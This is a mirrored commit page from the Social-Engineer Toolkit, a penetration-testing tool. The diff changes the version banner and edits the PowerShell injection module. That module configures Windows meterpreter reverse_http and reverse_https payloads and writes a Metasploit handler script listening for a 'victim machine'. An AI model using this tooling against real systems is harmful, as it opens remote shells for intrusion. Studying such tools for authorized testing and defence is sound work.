mirror of
https://github.com/trustedsec/social-engineer-toolkit
synced 2024-11-23 21:13:05 +00:00
Removed additional prompt within powershell alphanum generator
This commit is contained in:
parent
25062b5e0b
commit
c54123b364
3 changed files with 13 additions and 5 deletions
|
@ -223,7 +223,7 @@ def print_error(message):
|
|||
print bcolors.RED + bcolors.BOLD + "[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC
|
||||
|
||||
def get_version():
|
||||
define_version = '4.4.5'
|
||||
define_version = '4.7'
|
||||
return define_version
|
||||
|
||||
class create_menu:
|
||||
|
@ -843,7 +843,7 @@ def show_banner(define_version,graphic):
|
|||
[---] The Social-Engineer Toolkit ("""+bcolors.YELLOW+"""SET"""+bcolors.BLUE+""") [---]
|
||||
[---] Created by:""" + bcolors.RED+""" David Kennedy """+bcolors.BLUE+"""("""+bcolors.YELLOW+"""ReL1K"""+bcolors.BLUE+""") [---]
|
||||
[---] Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+""" [---]
|
||||
[---] Codename: '""" + bcolors.YELLOW + """The Goat""" + bcolors.BLUE + """' [---]
|
||||
[---] Codename: '""" + bcolors.YELLOW + """The Werewolf""" + bcolors.BLUE + """' [---]
|
||||
[---] Follow us on Twitter: """ + bcolors.PURPLE+ """@trustedsec""" + bcolors.BLUE+""" [---]
|
||||
[---] Follow me on Twitter: """ + bcolors.PURPLE+ """@dave_rel1k""" + bcolors.BLUE+""" [---]
|
||||
[---] Homepage: """ + bcolors.YELLOW + """https://www.trustedsec.com""" + bcolors.BLUE+""" [---]
|
||||
|
|
|
@ -18,6 +18,7 @@ else:
|
|||
powershell_inject_x64 = check_config("POWERSHELL_INJECT_PAYLOAD_X64=")
|
||||
powershell_inject_x86 = check_config("POWERSHELL_INJECT_PAYLOAD_X86=")
|
||||
|
||||
# if we specified a hostname then default to reverse https/http
|
||||
if validate_ip(ipaddr) == False:
|
||||
powershell_inject_x64 = "windows/meterpreter/reverse_https"
|
||||
powershell_inject_x86 = "windows/meterpreter/reverse_http"
|
||||
|
@ -36,16 +37,23 @@ if os.path.isfile("%s/src/program_junk/meta_config_multipyinjector" % (definepat
|
|||
filewrite.write("\nuse exploit/multi/handler\nset PAYLOAD %s\nset LHOST 0.0.0.0\nset LPORT %s\nset ExitOnSession false\nexploit -j\n" % (powershell_inject_x86, port))
|
||||
filewrite.close()
|
||||
|
||||
# check to see if the meta config multi pyinjector is there
|
||||
if not os.path.isfile("%s/src/program_junk/meta_config_multipyinjector" % (definepath)):
|
||||
if os.path.isfile("%s/src/program_junk/port.options" % (definepath)):
|
||||
fileopen = file("%s/src/program_junk/port.options" % (definepath), "r")
|
||||
port = fileopen.read()
|
||||
|
||||
# if port.options isnt there then prompt
|
||||
if not os.path.isfile("%s/src/program_junk/port.options" % (definepath)):
|
||||
port=raw_input(setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
|
||||
if port == "": port = "443"
|
||||
# write out port.options for later use
|
||||
filewrite = file("%s/src/program_junk/port.options" % (definepath), "w")
|
||||
filewrite.write(port)
|
||||
filewrite.close()
|
||||
|
||||
print_status("Generating x64-based powershell injection code...")
|
||||
# define a base variable
|
||||
x64 = ""
|
||||
x86 = ""
|
||||
|
||||
|
|
|
@ -56,7 +56,7 @@ if powershell_menu_choice != "99":
|
|||
|
||||
choice = yesno_prompt("0","Do you want to start the listener now [yes/no]: ")
|
||||
if choice == 'NO':
|
||||
pass #print_status("To create the listener for Metasploit, run msfconsole -r powershell.rc")
|
||||
pass
|
||||
# if we want to start the listener
|
||||
if choice == 'YES':
|
||||
victim = raw_input(setprompt(["29"], "Select x86 or x64 victim machine [default: x64]"))
|
||||
|
|
Loading…
Reference in a new issue